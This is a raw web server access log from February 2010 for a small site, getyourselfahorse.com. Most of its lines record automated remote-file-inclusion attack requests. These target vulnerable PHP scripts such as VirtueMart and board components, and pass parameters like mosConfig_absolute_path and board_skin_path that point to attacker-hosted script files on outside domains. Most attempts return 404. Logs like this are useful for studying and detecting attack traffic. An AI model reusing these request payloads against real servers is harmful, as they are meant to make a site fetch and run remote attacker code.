66.103.128.44 - - [06/Feb/2010:00:27:19 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
66.103.128.44 - - [06/Feb/2010:00:27:19 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
66.103.128.44 - - [06/Feb/2010:00:27:19 -0800] "GET /logs/access_100116.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
66.103.128.44 - - [06/Feb/2010:00:29:14 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
66.103.128.44 - - [06/Feb/2010:00:29:14 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
66.103.128.44 - - [06/Feb/2010:00:29:14 -0800] "GET /logs/access_100116.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
213.171.37.206 - - [06/Feb/2010:00:29:16 -0800] "GET /logs/access_100130.log//errors.php?error=http://hypotheekservice.net/images/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.getyourselfahorse.com"
121.88.4.141 - - [06/Feb/2010:00:31:47 -0800] "GET /logs/access_100116.log//admin.lurm_constructor.php?lm_absolute_path=http://tian2010.fileave.com/idxx.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
66.103.128.44 - - [06/Feb/2010:00:33:06 -0800] "GET /write_update.php?board_skin_path=http://www.sarpifirenze.it/media/ahhe.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.getyourselfahorse.com"
66.103.128.44 - - [06/Feb/2010:00:33:06 -0800] "GET /logs//write_update.php?board_skin_path=http://www.sarpifirenze.it/media/ahhe.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.getyourselfahorse.com"
195.190.166.35 - - [06/Feb/2010:00:33:13 -0800] "GET /logs/access_100130.log%20%20//delete_all.php?board_skin_path=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
195.190.166.35 - - [06/Feb/2010:00:39:26 -0800] "GET /delete_all.php?board_skin_path=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
195.190.166.35 - - [06/Feb/2010:00:39:26 -0800] "GET /logs/access_100116.log//delete_all.php?board_skin_path=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
195.190.166.35 - - [06/Feb/2010:00:39:26 -0800] "GET /logs//delete_all.php?board_skin_path=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
195.190.166.35 - - [06/Feb/2010:00:40:19 -0800] "GET /delete_all.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
195.190.166.35 - - [06/Feb/2010:00:40:19 -0800] "GET /logs//delete_all.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
195.190.166.35 - - [06/Feb/2010:00:40:20 -0800] "GET /logs/access_100116.log//delete_all.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
121.88.4.141 - - [06/Feb/2010:00:41:12 -0800] "GET /logs/access_100116.log//admin.lurm_constructor.php?lm_absolute_path=http://tian2010.fileave.com/idxx.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
195.190.166.35 - - [06/Feb/2010:00:42:56 -0800] "GET /delete_all.php?board_skin_path=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
195.190.166.35 - - [06/Feb/2010:00:42:56 -0800] "GET /logs//delete_all.php?board_skin_path=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
195.190.166.35 - - [06/Feb/2010:00:42:56 -0800] "GET /logs/access.log//delete_all.php?board_skin_path=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
195.190.166.35 - - [06/Feb/2010:00:43:03 -0800] "GET /delete_all.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
195.190.166.35 - - [06/Feb/2010:00:43:03 -0800] "GET /logs//delete_all.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
195.190.166.35 - - [06/Feb/2010:00:43:03 -0800] "GET /logs/access.log//delete_all.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
195.190.166.35 - - [06/Feb/2010:00:43:55 -0800] "GET /logs/access_100116.log//delete_all.php?board_skin_path=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
195.190.166.35 - - [06/Feb/2010:00:43:57 -0800] "GET /logs/access_100116.log//delete_all.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
116.125.120.5 - - [06/Feb/2010:00:45:14 -0800] "GET /logs/access_100116.log/components/com_performs/performs.php?mosConfig_absolute_path=http://www.bangkokcrystal.com/_admin/uploadfiles/files/pro/CMD.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.getyourselfahorse.com"
116.125.120.5 - - [06/Feb/2010:00:45:14 -0800] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://www.bangkokcrystal.com/_admin/uploadfiles/files/pro/CMD.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.getyourselfahorse.com"
116.125.120.5 - - [06/Feb/2010:00:45:14 -0800] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.bangkokcrystal.com/_admin/uploadfiles/files/pro/CMD.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.getyourselfahorse.com"
195.190.166.35 - - [06/Feb/2010:00:45:36 -0800] "GET /delete_all.php?board_skin_path=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
195.190.166.35 - - [06/Feb/2010:00:45:36 -0800] "GET /logs/access.log%20%20//delete_all.php?board_skin_path=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
195.190.166.35 - - [06/Feb/2010:00:45:36 -0800] "GET /logs//delete_all.php?board_skin_path=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
195.190.166.35 - - [06/Feb/2010:00:45:42 -0800] "GET /delete_all.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
195.190.166.35 - - [06/Feb/2010:00:45:42 -0800] "GET /logs/access.log%20%20//delete_all.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
195.190.166.35 - - [06/Feb/2010:00:45:42 -0800] "GET /logs//delete_all.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
116.125.120.5 - - [06/Feb/2010:00:46:05 -0800] "GET /logs/access_091121.log/components/com_performs/performs.php?mosConfig_absolute_path=http://www.bangkokcrystal.com/_admin/uploadfiles/files/pro/CMD.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.getyourselfahorse.com"
95.108.150.235 - - [06/Feb/2010:00:46:31 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "Yandex/1.01.001 (compatible; Win16; H)" "www.getyourselfahorse.com"
95.108.150.235 - - [06/Feb/2010:00:46:32 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "Yandex/1.01.001 (compatible; Win16; H)" "getyourselfahorse.com"
95.108.150.235 - - [06/Feb/2010:00:46:33 -0800] "GET / HTTP/1.1" 200 915 "-" "Yandex/1.01.001 (compatible; Win16; H)" "www.getyourselfahorse.com"
95.108.150.235 - - [06/Feb/2010:00:46:34 -0800] "GET / HTTP/1.1" 200 915 "-" "Yandex/1.01.001 (compatible; Win16; H)" "getyourselfahorse.com"
95.108.150.235 - - [06/Feb/2010:00:46:35 -0800] "GET / HTTP/1.1" 200 915 "-" "Yandex/1.01.001 (compatible; Win16; H)" "www.getyourselfahorse.com"
95.108.150.235 - - [06/Feb/2010:00:46:36 -0800] "GET / HTTP/1.1" 200 915 "-" "Yandex/1.01.001 (compatible; Win16; H)" "getyourselfahorse.com"
116.125.120.5 - - [06/Feb/2010:00:47:59 -0800] "GET /logs/access_091121.log%20/components/com_performs/performs.php?mosConfig_absolute_path=http://www.bangkokcrystal.com/_admin/uploadfiles/files/pro/CMD.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.getyourselfahorse.com"
195.190.166.35 - - [06/Feb/2010:00:49:26 -0800] "GET /logs/access_100130.log%20%20//delete_all.php?board_skin_path=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
195.190.166.35 - - [06/Feb/2010:00:49:30 -0800] "GET /logs/access_100130.log%20%20//delete_all.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
212.150.147.153 - - [06/Feb/2010:00:52:58 -0800] "GET /logs/access_100116.log%20%20//comment_modify.php?board_skin_path=http://www.onroadzone.com/zboard/a.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
212.150.147.153 - - [06/Feb/2010:00:52:58 -0800] "GET /logs//comment_modify.php?board_skin_path=http://www.onroadzone.com/zboard/a.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
212.150.147.153 - - [06/Feb/2010:00:52:58 -0800] "GET /comment_modify.php?board_skin_path=http://www.onroadzone.com/zboard/a.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
212.150.147.153 - - [06/Feb/2010:00:54:50 -0800] "GET /comment_modify.php?board_skin_path=http://www.onroadzone.com/zboard/a.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
66.103.128.44 - - [06/Feb/2010:00:54:50 -0800] "GET /logs//write_update.php?board_skin_path=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
66.103.128.44 - - [06/Feb/2010:00:54:50 -0800] "GET /write_update.php?board_skin_path=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
66.103.128.44 - - [06/Feb/2010:00:54:50 -0800] "GET /logs/access_100130.log//write_update.php?board_skin_path=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
212.150.147.153 - - [06/Feb/2010:00:55:02 -0800] "GET /logs/access_100116.log//comment_modify.php?board_skin_path=http://www.onroadzone.com/zboard/a.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
212.150.147.153 - - [06/Feb/2010:00:55:02 -0800] "GET /logs//comment_modify.php?board_skin_path=http://www.onroadzone.com/zboard/a.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
212.150.147.153 - - [06/Feb/2010:00:55:53 -0800] "GET /logs/access_091121.log//comment_modify.php?board_skin_path=http://www.onroadzone.com/zboard/a.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
212.150.147.153 - - [06/Feb/2010:00:57:19 -0800] "GET /logs/access_100116.log%20%20//comment_modify.php?board_skin_path=http://www.onroadzone.com/zboard/a.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
212.150.147.153 - - [06/Feb/2010:00:57:19 -0800] "GET /logs//comment_modify.php?board_skin_path=http://www.onroadzone.com/zboard/a.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
212.150.147.153 - - [06/Feb/2010:00:57:19 -0800] "GET /comment_modify.php?board_skin_path=http://www.onroadzone.com/zboard/a.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
66.103.128.44 - - [06/Feb/2010:00:58:00 -0800] "GET /logs/access_100116.log//write_update.php?board_skin_path=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
212.150.147.153 - - [06/Feb/2010:00:58:28 -0800] "GET /logs/access_091024.log%20%20//comment_modify.php?board_skin_path=http://www.onroadzone.com/zboard/a.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
66.103.128.44 - - [06/Feb/2010:00:59:14 -0800] "GET /write_update.php?board_skin_path=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
66.103.128.44 - - [06/Feb/2010:00:59:14 -0800] "GET /logs//write_update.php?board_skin_path=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
66.103.128.44 - - [06/Feb/2010:00:59:14 -0800] "GET /logs/access_100130.log%20%20//write_update.php?board_skin_path=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
66.103.128.44 - - [06/Feb/2010:01:01:21 -0800] "GET /logs/access_100116.log%20%20//write_update.php?board_skin_path=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
212.150.147.153 - - [06/Feb/2010:01:03:29 -0800] "GET /logs/access_091024.log%20%20//comment_modify.php?board_skin_path=http://www.onroadzone.com/zboard/a.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
212.150.147.153 - - [06/Feb/2010:01:05:11 -0800] "GET /logs/access_100116.log//comment_modify.php?board_skin_path=http://www.onroadzone.com/zboard/a.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
212.150.147.153 - - [06/Feb/2010:01:06:15 -0800] "GET /logs/access_091121.log//comment_modify.php?board_skin_path=http://www.onroadzone.com/zboard/a.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
212.150.147.153 - - [06/Feb/2010:01:10:38 -0800] "GET /logs/access_100116.log//comment_modify.php?board_skin_path=http://www.onroadzone.com/zboard/a.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
212.150.147.153 - - [06/Feb/2010:01:11:36 -0800] "GET /logs/access_091121.log//comment_modify.php?board_skin_path=http://www.onroadzone.com/zboard/a.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
121.97.191.153 - - [06/Feb/2010:01:12:12 -0800] "GET /logs/access_100116.log%20%20//init_basic.php?GALLERY_BASEDIR=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
121.97.191.153 - - [06/Feb/2010:01:12:12 -0800] "GET /init_basic.php?GALLERY_BASEDIR=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
121.97.191.153 - - [06/Feb/2010:01:12:12 -0800] "GET /logs//init_basic.php?GALLERY_BASEDIR=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
147.123.157.1 - - [06/Feb/2010:01:13:22 -0800] "GET /logs/?microcms_path=http://www.bvsc1911.hu//modules/list/m1.txt?? HTTP/1.1" 200 1224 "-" "Mozilla/5.0" "www.getyourselfahorse.com"
147.123.157.1 - - [06/Feb/2010:01:13:22 -0800] "GET /logs/access_091121.log%20%20/?microcms_path=http://www.bvsc1911.hu//modules/list/m1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
147.123.157.1 - - [06/Feb/2010:01:13:26 -0800] "GET /?microcms_path=http://www.bvsc1911.hu//modules/list/m1.txt?? HTTP/1.1" 200 915 "-" "Mozilla/5.0" "www.getyourselfahorse.com"
147.123.157.1 - - [06/Feb/2010:01:13:27 -0800] "GET /logs/access_091121.log%20%20/?microcms_path=http://www.bvsc1911.hu//modules/list/m1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
147.123.157.1 - - [06/Feb/2010:01:13:27 -0800] "GET /logs/?microcms_path=http://www.bvsc1911.hu//modules/list/m1.txt?? HTTP/1.1" 200 1224 "-" "Mozilla/5.0" "www.getyourselfahorse.com"
147.123.157.1 - - [06/Feb/2010:01:13:43 -0800] "GET /logs/access_091024.log%20%20/?microcms_path=http://www.bvsc1911.hu//modules/list/m1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
147.123.157.1 - - [06/Feb/2010:01:13:48 -0800] "GET /logs/access_091024.log%20%20/?microcms_path=http://www.bvsc1911.hu//modules/list/m1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
193.19.177.19 - - [06/Feb/2010:01:15:00 -0800] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute_path=http://institutgarcia.net/images/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
193.19.177.19 - - [06/Feb/2010:01:15:00 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute_path=http://institutgarcia.net/images/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
193.19.177.19 - - [06/Feb/2010:01:15:00 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute_path=http://institutgarcia.net/images/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
218.38.136.126 - - [06/Feb/2010:01:15:26 -0800] "GET /logs//bookmark4u/lostpasswd.php?env[include_prefix]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
218.38.136.126 - - [06/Feb/2010:01:15:27 -0800] "GET /logs/access_091121.log//bookmark4u/lostpasswd.php?env[include_prefix]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
218.38.136.126 - - [06/Feb/2010:01:15:27 -0800] "GET /bookmark4u/lostpasswd.php?env[include_prefix]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
218.38.136.126 - - [06/Feb/2010:01:15:32 -0800] "GET /bookmark4u/lostpasswd.php?env[include_prefix]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
218.38.136.126 - - [06/Feb/2010:01:15:32 -0800] "GET /logs/access_091121.log//bookmark4u/lostpasswd.php?env[include_prefix]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
218.38.136.126 - - [06/Feb/2010:01:15:32 -0800] "GET /logs//bookmark4u/lostpasswd.php?env[include_prefix]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
193.19.177.19 - - [06/Feb/2010:01:15:32 -0800] "GET /logs/access_091121.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute_path=http://institutgarcia.net/images/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
193.19.177.19 - - [06/Feb/2010:01:18:49 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute_path=http://institutgarcia.net/images/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
193.19.177.19 - - [06/Feb/2010:01:18:49 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute_path=http://institutgarcia.net/images/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
193.19.177.19 - - [06/Feb/2010:01:18:49 -0800] "GET /logs/access.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute_path=http://institutgarcia.net/images/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
200.93.147.154 - - [06/Feb/2010:01:18:50 -0800] "GET /include/bbs.lib.inc.php?site_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
200.93.147.154 - - [06/Feb/2010:01:18:52 -0800] "GET /logs/access_091121.log%20%20//include/bbs.lib.inc.php?site_path=http://musicadelibreria.net/footer?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
200.93.147.154 - - [06/Feb/2010:01:18:52 -0800] "GET /logs//include/bbs.lib.inc.php?site_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
218.38.136.126 - - [06/Feb/2010:01:21:09 -0800] "GET /logs/access_091121.log%20%20//bookmark4u/lostpasswd.php?env[include_prefix]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
67.195.113.251 - - [06/Feb/2010:01:21:18 -0800] "GET /tmp/?S=A HTTP/1.0" 200 504 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.getyourselfahorse.com"
218.38.136.126 - - [06/Feb/2010:01:22:13 -0800] "GET /logs/access_091121.log%20%20//bookmark4u/lostpasswd.php?env[include_prefix]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
218.38.136.126 - - [06/Feb/2010:01:22:50 -0800] "GET /logs/access_100130.log%20%20//bookmark4u/lostpasswd.php?env[include_prefix]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
147.123.157.1 - - [06/Feb/2010:01:23:23 -0800] "GET /logs/access_091121.log/?microcms_path=http://www.bvsc1911.hu//modules/list/m1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
147.123.157.1 - - [06/Feb/2010:01:23:27 -0800] "GET /logs/access_091024.log/?microcms_path=http://www.bvsc1911.hu//modules/list/m1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
147.123.157.1 - - [06/Feb/2010:01:23:34 -0800] "GET /logs/access.log/?microcms_path=http://www.bvsc1911.hu//modules/list/m1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
147.123.157.1 - - [06/Feb/2010:01:23:34 -0800] "GET /logs/?microcms_path=http://www.bvsc1911.hu//modules/list/m1.txt?? HTTP/1.1" 200 1224 "-" "Mozilla/5.0" "getyourselfahorse.com"
147.123.157.1 - - [06/Feb/2010:01:23:34 -0800] "GET /?microcms_path=http://www.bvsc1911.hu//modules/list/m1.txt?? HTTP/1.1" 200 915 "-" "Mozilla/5.0" "getyourselfahorse.com"
147.123.157.1 - - [06/Feb/2010:01:24:05 -0800] "GET /logs/access_091121.log/?microcms_path=http://www.bvsc1911.hu//modules/list/m1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
147.123.157.1 - - [06/Feb/2010:01:24:09 -0800] "GET /logs/access_091024.log/?microcms_path=http://www.bvsc1911.hu//modules/list/m1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
147.123.157.1 - - [06/Feb/2010:01:24:15 -0800] "GET /?microcms_path=http://www.bvsc1911.hu//modules/list/m1.txt?? HTTP/1.1" 200 915 "-" "Mozilla/5.0" "getyourselfahorse.com"
147.123.157.1 - - [06/Feb/2010:01:24:15 -0800] "GET /logs/?microcms_path=http://www.bvsc1911.hu//modules/list/m1.txt?? HTTP/1.1" 200 1224 "-" "Mozilla/5.0" "getyourselfahorse.com"
147.123.157.1 - - [06/Feb/2010:01:24:15 -0800] "GET /logs/access.log/?microcms_path=http://www.bvsc1911.hu//modules/list/m1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
218.38.136.126 - - [06/Feb/2010:01:24:36 -0800] "GET /logs/access_100130.log%20%20//bookmark4u/lostpasswd.php?env[include_prefix]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
121.97.191.153 - - [06/Feb/2010:01:33:51 -0800] "GET /init_basic.php?GALLERY_BASEDIR=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
121.97.191.153 - - [06/Feb/2010:01:33:51 -0800] "GET /logs/access_100116.log%20%20//init_basic.php?GALLERY_BASEDIR=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
121.97.191.153 - - [06/Feb/2010:01:33:51 -0800] "GET /logs//init_basic.php?GALLERY_BASEDIR=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
110.45.146.189 - - [06/Feb/2010:01:36:16 -0800] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://gminamakow.info//dmdocuments/mambo?? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "getyourselfahorse.com"
110.45.146.189 - - [06/Feb/2010:01:36:16 -0800] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://gminamakow.info//dmdocuments/mambo?? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "getyourselfahorse.com"
60.251.165.181 - - [06/Feb/2010:01:36:21 -0800] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.h1cc.net/somd/images/topics/templates/sken/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
60.251.165.181 - - [06/Feb/2010:01:36:22 -0800] "GET /logs//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.h1cc.net/somd/images/topics/templates/sken/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
60.251.165.181 - - [06/Feb/2010:01:36:22 -0800] "GET /logs/access_091121.log%20%20//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.h1cc.net/somd/images/topics/templates/sken/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
121.97.191.153 - - [06/Feb/2010:01:37:21 -0800] "GET /init_basic.php?GALLERY_BASEDIR=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
121.97.191.153 - - [06/Feb/2010:01:37:21 -0800] "GET /logs/access_100116.log//init_basic.php?GALLERY_BASEDIR=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
121.97.191.153 - - [06/Feb/2010:01:37:21 -0800] "GET /logs//init_basic.php?GALLERY_BASEDIR=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
